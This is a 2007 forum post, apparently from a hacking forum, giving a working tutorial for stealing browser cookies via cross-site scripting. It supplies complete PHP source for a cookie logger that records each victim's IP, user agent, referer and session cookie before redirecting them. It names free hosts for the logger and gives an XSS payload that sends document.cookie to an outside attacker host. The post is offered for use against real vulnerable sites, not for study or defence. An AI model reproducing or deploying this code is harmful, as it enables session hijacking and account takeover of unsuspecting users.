zbeng Posted June 13, 2007 Report Posted June 13, 2007 Tools used: Free hosting that support php 2 php pages Vulnerable site.Let's work: First register a free hosting account. You can try on this sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org . After all: registration and activation, we need to upload this 2 php pages on the site.vb.php<head><meta http-equiv="Content-Language" content="it"><title>Cookies Stealther - Designed and programmed by R00t[ATI]</title></head><body bgcolor="#C0C0C0"><p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p><p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p><p align="left"></p></body>documents.php<?php$ip = $_SERVER['REMOTE_ADDR'];$referer = $_SERVER['HTTP_REFERER'];$agent = $_SERVER['HTTP_USER_AGENT'];$data = $_GET[c];$time = date("Y-m-d G:i:s A");$text = "".$time." = ".$ip."User Agent: ".$agent."Referer: ".$referer."Session: ".$data."";$file = fopen('vb.php' , 'a');fwrite($file,$text);fclose($file);header("Location: http://www.google.com");?>Vb.php file is used to SHOW at the attacker what cookies are grabbed and other information.documents.php file is used to GRAB information at the victim like: ip address, user agent and naturally cookies.Now, we need to find vulnerable site to Cross Site Scripting (XSS). After this insert a script that call documents.php that grab document cookie by using "c" method: documents.php?c="+document.cookie;For example: http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location="http://syshack.sy.funpic.de/documents.php?c="+document.cookie;</script>Victim will be redirected to http://www.google.com (edit it in documents.php). And the attacker can be see victim cookies on vb.php Quote
